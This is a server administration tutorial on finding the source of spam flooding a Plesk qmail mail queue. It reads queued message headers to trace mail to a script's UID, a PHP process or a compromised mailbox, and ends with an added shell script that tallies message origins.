If the Plesk Qmail mail queue is flooded with messages, there is a good chance that your Plesk server is being used to send spam.

On a Plesk server open relaying is not allowed by default, so spam is usually sent in one of the following ways, each of which is explained below:

1) A CGI script run by a system user
2) A PHP script
3) A compromised email account

First, let's look at the mail queue:

# /var/qmail/bin/qmail-qstat
messages in queue: 22507
messages in queue but not yet preprocessed: 0

As you can see above, there is a large number of emails in the queue. The source of these emails could be either a PHP/CGI script or an authenticated email account on the server.

Let's start by listing the queue with 'qmail-qread':

# /var/qmail/bin/qmail-qread
5 Nov 2012 11:50:17 GMT #768752 1231 
remote user1@domain1.com
remote user2@domain1.com
remote user1@domain2.com

This lists every message in the queue: the date it was queued, its message ID and size in bytes, followed by one line per recipient ('remote' for off-server addresses, 'local' for local mailboxes).

In the example above #768752 is the message ID. Next, find the file that holds this message so you can read its complete headers:

# find /var/qmail/queue/mess/ -name 768752
/var/qmail/queue/mess/0/768752

That is the full path of the message file. Open it and look for the "Received" lines:

# less /var/qmail/queue/mess/0/768752

The first "Received" line, added by qmail when the message was injected, shows where the message came from: whether it was injected locally (and by which UID) or received over the network.

1) If the message was injected locally by a CGI script (or any other process) running as a system user, the line shows that user's UID:

Received: (qmail 26193 invoked by uid 10001); 5 Nov 2012 11:50:17

Now look up UID 10001 in the passwd database to find the account and its home directory, which on Plesk is the vhost directory of the domain. Match the UID field exactly; a plain 'grep 10001 /etc/passwd' would also match UID 100010 or any path containing those digits:

# getent passwd 10001

This prints the passwd entry for UID 10001, including the home directory that tells you which domain it belongs to.

2) If the email was sent by a PHP script running inside Apache (mod_php), the "Received" line shows the UID of the apache user, which is 48 on RHEL/CentOS-based systems (check with 'id -u apache'). Note that if PHP runs as FastCGI or PHP-FPM, the script runs as the subscription's system user and the message looks like case 1 instead.

Received: (qmail 26193 invoked by uid 48); 5 Nov 2012 11:50:17 +000

In that case the UID alone does not tell you which site is responsible, so you have to catch the script in the act, i.e. see which PHP scripts are running while the emails are being sent.

Run the command below as-is while the mail queue is growing rapidly. It lists, every second, the PHP files under the vhosts directory that the httpd processes currently have open:

# lsof +r 1 -p `ps axww | grep httpd | grep -v grep | \
awk ' { if(!str) { str=$1 } else { str=str","$1}}END{print str}'` \
| grep vhosts | grep php

The backquoted part builds a comma-separated list of httpd PIDs for lsof's -p option ('pgrep -d, httpd' does the same on systems that have it). This only catches scripts that have a PHP file open at the moment lsof polls, so short-lived scripts can slip through; on PHP 5.3 and later, setting 'mail.add_x_header = On' in php.ini makes every message sent through mail() carry an 'X-PHP-Originating-Script' header with the UID and file name of the calling script, which you can then read directly from the queued message.
3) Email accounts are often compromised and used to send bulk/spam emails from other locations. In that case the "Received" line contains "invoked from network":

Received: (qmail 26193 invoked from network); 5 Nov 2012 11:50:17

The "Received" line added next by qmail-smtpd records the IP address of the connecting host. To find out which mailbox authenticated, check the Plesk mail log (typically /usr/local/psa/var/log/maillog) for the smtp_auth "logged in" entries around the time the message was queued, then change that mailbox's password and clear the queue.
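With thousands of messages in the queue, reading "Received" lines one file at a time is slow. The script below is an added example, not part of the original post or of Plesk: it classifies qmail "Received" lines by origin (local UID or network), tallies them, and resolves each UID to an account name with an exact match on the UID field. The sample "Received" lines and the passwd fragment are constructed for the example, and the assumption that UID 48 is apache is taken from the CentOS default above.

```shell
#!/bin/sh
# Added example (not from the original post): classify qmail "Received:" lines
# pulled from queued messages and tally them per origin, so you can see whether
# the queue is being filled by one site user, by Apache (uid 48 here, an
# assumption; check `id -u apache` on your server), or by network senders.

# Constructed sample: one "Received:" line per queued message. Not real data.
SAMPLE_RECEIVED='Received: (qmail 26193 invoked by uid 10001); 5 Nov 2012 11:50:17 -0000
Received: (qmail 26201 invoked by uid 48); 5 Nov 2012 11:50:18 -0000
Received: (qmail 26210 invoked by uid 48); 5 Nov 2012 11:50:18 -0000
Received: (qmail 26222 invoked from network); 5 Nov 2012 11:50:19 -0000
Received: (qmail 26230 invoked by uid 10001); 5 Nov 2012 11:50:20 -0000
Received: (qmail 26241 invoked by uid 48); 5 Nov 2012 11:50:21 -0000'

# Constructed /etc/passwd fragment for the uid -> account lookup. Note the
# uid 100010 entry: a plain `grep 10001` would match it too.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
example_user:x:10001:505:Example domain:/var/www/vhosts/example.com:/bin/false
otheruser:x:100010:505::/var/www/vhosts/other.com:/bin/false'

# classify_received LINE -> prints "uid N", "network" or "unknown"
classify_received() {
    case "$1" in
        *"invoked by uid "*)
            uid=${1#*"invoked by uid "}   # drop everything up to the uid
            uid=${uid%%)*}                # drop ")" and the rest
            printf 'uid %s\n' "$uid" ;;
        *"invoked from network"*) printf 'network\n' ;;
        *) printf 'unknown\n' ;;
    esac
}

# uid_to_account UID PASSWD_TEXT -> login name whose third field equals UID exactly
uid_to_account() {
    printf '%s\n' "$2" | awk -F: -v uid="$1" '$3 == uid { print $1 }'
}

# tally_origins RECEIVED_TEXT PASSWD_TEXT -> "count origin (account)" lines,
# most frequent origin first
tally_origins() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        classify_received "$line"
    done | sort | uniq -c | sort -rn | while read -r count kind uid; do
        if [ "$kind" = uid ]; then
            printf '%s uid %s (%s)\n' "$count" "$uid" "$(uid_to_account "$uid" "$2")"
        else
            printf '%s %s\n' "$count" "$kind"
        fi
    done
}

# Prints:
#   3 uid 48 (apache)
#   2 uid 10001 (example_user)
#   1 network
tally_origins "$SAMPLE_RECEIVED" "$SAMPLE_PASSWD"
```

On a live server, replace the sample input with the first qmail "Received" line of each queued message, for example `for f in /var/qmail/queue/mess/*/*; do sed -n '/^Received: (qmail/{p;q;}' "$f"; done`, and pass `"$(cat /etc/passwd)"` as the second argument. A count dominated by one UID points at that site's scripts; a count dominated by "network" points at a compromised mailbox, which the mail log identifies.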
